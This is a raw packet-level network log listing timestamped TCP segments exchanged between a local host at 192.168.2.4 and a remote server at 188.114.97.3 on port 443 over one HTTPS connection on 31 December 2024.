Dec 31, 2024 08:57:13.951592922 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.953136921 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.968569040 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.968585014 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.968760014 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.968765974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.971708059 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.985136986 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.985160112 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.985255003 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.985255003 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.985260010 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.985460043 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.985697985 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.985713005 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.985817909 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.985817909 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.985824108 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.985905886 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.988218069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.988234043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.988392115 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.988396883 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.988522053 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.988797903 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.988817930 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.988904953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.988904953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.988910913 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.989288092 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.037259102 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.037275076 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.037309885 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.037314892 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.037339926 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.037626982 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.037728071 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.037741899 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.037838936 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.037843943 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.038203955 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.038225889 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.038254976 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.038254976 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.038261890 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.038288116 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.038410902 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.055489063 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.055512905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.055557013 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.055566072 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.055619955 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.055701971 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.079885960 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.079906940 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.079941034 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.079946995 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.079978943 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.080002069 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.080482006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.080497980 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.080542088 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.080545902 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.080591917 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.080591917 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.083101988 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.083116055 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.083194971 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.083199024 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.083220005 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.083236933 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.117141962 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.117185116 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.117276907 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.117276907 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.117290974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.120800972 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.124061108 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.124088049 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.124129057 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.124135971 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.124170065 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.124191999 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.124684095 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.124701023 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.124751091 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.124758005 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.124769926 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.125075102 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.125101089 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.125139952 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.125144005 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.125191927 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.128653049 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.142433882 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.142453909 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.142530918 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.142541885 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.144774914 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.156548023 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.166799068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.166817904 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.166887045 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.166893005 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.167342901 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.167366028 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.167392969 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.167397976 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.167418003 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.167500973 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.169888973 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.169903040 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.169980049 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.169984102 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.172785044 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.203929901 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.203944921 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.204021931 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.204026937 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.204869986 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.210885048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.210900068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.211025953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.211025953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.211031914 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.211463928 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.211484909 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.211512089 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.211518049 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.211544037 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.211560965 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.211879015 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.211891890 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.211970091 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.211970091 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.211975098 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.212660074 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.229264975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.229283094 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.229321003 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.229325056 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.229434013 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.229434013 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.229439974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.253724098 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.253741980 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.253781080 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.253787041 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.253819942 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.254271030 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.254283905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.254318953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.254323959 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.254342079 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.256768942 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.256788015 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.256839037 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.256844044 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.256889105 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.290818930 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.290842056 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.290908098 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.290913105 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.290939093 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.297681093 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.297698975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.297755003 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.297760010 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.297790051 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.298224926 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.298238039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.298295021 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.298295021 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.298299074 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.298751116 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.298770905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.298795938 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.298800945 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.298836946 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.316148996 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.316164017 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.316230059 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.316236973 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.340450048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.340473890 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.340550900 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.340559959 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.340599060 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.340924978 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.340939045 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.340982914 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.340989113 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.341026068 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.343483925 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.343502998 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.343543053 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.343549013 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.343590975 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.377615929 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.377629995 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.377691031 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.377697945 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.377727985 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.384356976 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.384375095 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.384423018 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.384430885 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.384449959 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.384917974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.384929895 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.384998083 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.385001898 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.385431051 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.385451078 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.385477066 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.385483027 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.385562897 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.402968884 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.402981997 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.403058052 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.403064013 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.427299976 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.427330971 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.427372932 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.427376986 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.427381039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.427405119 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.427439928 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.427442074 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.427824020 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.427836895 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.427906036 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.427911043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.430408955 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.430427074 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.430495024 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.430499077 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.430512905 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.464447975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.464462042 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.464592934 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.464592934 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.464601994 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.471368074 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.471385956 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.471429110 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.471436024 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.471467018 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.471921921 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.471934080 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.472007990 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.472007990 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.472013950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.472345114 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.472362041 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.472388029 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.472393036 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.472414970 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.489850044 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.489865065 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.489947081 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.489953041 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.489960909 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.514214993 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.514234066 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.514307976 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.514314890 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.514333963 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.514642000 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.514655113 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.514698029 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.514700890 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.514738083 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.517000914 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.517041922 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.517065048 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.517069101 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.517093897 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.551100969 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.551115990 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.551198006 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.551206112 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.559571981 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.559597969 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.559642076 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.559648991 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.559664011 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.560112953 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.560127020 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.560157061 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.560162067 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.560198069 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.560498953 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.560518980 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.560554981 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.560560942 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.560625076 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.576740026 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.576762915 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.576802969 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.576808929 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.576874971 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.600939035 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.600960016 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.601021051 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.601021051 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.601027966 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.601367950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.601382971 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.601470947 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.601470947 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.601476908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.603822947 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.603842020 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.603957891 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.603957891 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.603965998 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.637979031 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.637993097 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.638034105 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.638041019 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.638102055 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.646312952 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.646332979 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.646368027 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.646374941 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.646436930 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.646786928 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.646800041 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.646841049 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.646845102 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.646869898 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.647267103 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.647290945 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.647331953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.647336960 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.647377014 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.663614035 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.663624048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.663706064 CET	49735	443	192.168.2.4	188.114.97.3
